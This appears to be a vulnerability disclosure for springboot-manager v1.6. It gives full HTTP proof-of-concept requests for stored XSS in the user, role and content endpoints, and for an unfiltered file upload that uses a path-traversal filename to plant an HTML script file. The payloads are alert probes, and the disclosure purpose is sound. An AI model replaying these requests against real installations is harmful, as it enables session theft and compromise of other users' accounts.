Address: springboot-manager
[Suggested description]
There is a risk at interface: /sys/user that code execution is triggered when a user accesses the page. This kind of XSS is more dangerous, easy to cause worms, cookie theft, etc.
[Vendor of Product]
https://github.com/aitangbao/springboot-manager/releases/tag/v1.6
[Affected Product Code Base]
v1.6
[Affected Component]
/sys/user
POC
Enter the XSS code:
PUT /sys/user HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 195
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close
{"id":"1745973977530089473","deptId":"4bd0b0a3-097d-4902-a1f7-641ea3b771bd","username":"test<script>alert(1)</script>","password":"123456","phone":"15515512345","deptName":"部门1","status":"1"}
Trigger vulnerability:
POST /sys/users HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close
{}
[Vulnerability recurrence]
The vulnerability trigger point is in User Management, the vulnerability parameter is username:
Trigger vulnerability
[Suggested description]
There is a risk at interface: /sys/role that code execution is triggered when a user accesses the page. This kind of XSS is more dangerous, easy to cause worms, cookie theft, etc.
[Vendor of Product]
https://github.com/aitangbao/springboot-manager/releases/tag/v1.6
[Affected Product Code Base]
v1.6
[Affected Component]
/sys/role
POC
Enter the XSS code:
PUT /sys/role HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 135
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close
{"id":"1745993356841861121","name":"<script>alert(1)</script>","description":"<script>alert(2)</script>","status":"1","permissions":[]}
Trigger vulnerability:
POST /sys/roles HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close
{}
[Vulnerability recurrence]
The vulnerability trigger is in Role Management, the vulnerability parameter is name and description:
Trigger vulnerability
[Suggested description]
There is a risk at interface: /sysContent/add that code execution is triggered when a user accesses the page. This kind of XSS is more dangerous, easy to cause worms, cookie theft, etc.
[Vendor of Product]
https://github.com/aitangbao/springboot-manager/releases/tag/v1.6
[Affected Product Code Base]
v1.6
[Affected Component]
/sysContent/add
POC
Enter the XSS code:
POST /sysContent/add HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 104
authorization: A96L7u9MTzBj87Je0HWHe77m9v4T3602#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json; charset=UTF-8
Connection: close
{"id":"","title":"<script>alert(1)</script>","type":"0","content":"<script>alert(2)</script>","file":""}
Trigger vulnerability:
POST /sysContent/listByPage HTTP/1.1
Host: 192.168.0.100:8080
Content-Length: 2
authorization: 3o0z3ix86240O63M5e4U3zHK5p7Ew4HF#fcf34b56-a7a2-4719-9236-867495e74c31
Content-Type: application/json
Connection: close
{}
[Vulnerability recurrence]
The vulnerability trigger is in Role Management, the vulnerability parameter is title and content:
Trigger vulnerability
[Suggested description]
The system does not filter the suffixes of uploaded files. As a result, malicious xss files can be uploaded, triggering storage XSS vulnerabilities.
[Vendor of Product]
https://github.com/aitangbao/springboot-manager/releases/tag/v1.6
[Affected Product Code Base]
v1.6
[Affected Component]
/sysFiles/upload
POC
POST /sysFiles/upload?authorization=A96L7u9MTzBj87Je0HWHe77m9v4T3602%23fcf34b56-a7a2-4719-9236-867495e74c31 HTTP/1.1
Host: 192.168.0.100:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysToz7xWVQvklKbQC
Connection: close
Content-Length: 214
------WebKitFormBoundarysToz7xWVQvklKbQC
Content-Disposition: form-data; name="file"; filename="../../test.html"
Content-Type: image/jpeg
<script>alert(1)</script>
------WebKitFormBoundarysToz7xWVQvklKbQC--
[Vulnerability recurrence]
The trigger point of the vulnerability is "File Management" --> "Upload File"
[Code analysis]
Call the function sysFilesService.saveFile() to do this
Call getFileType() to get the file suffix
The suffix is obtained without any processing, and is simply spliced directly


















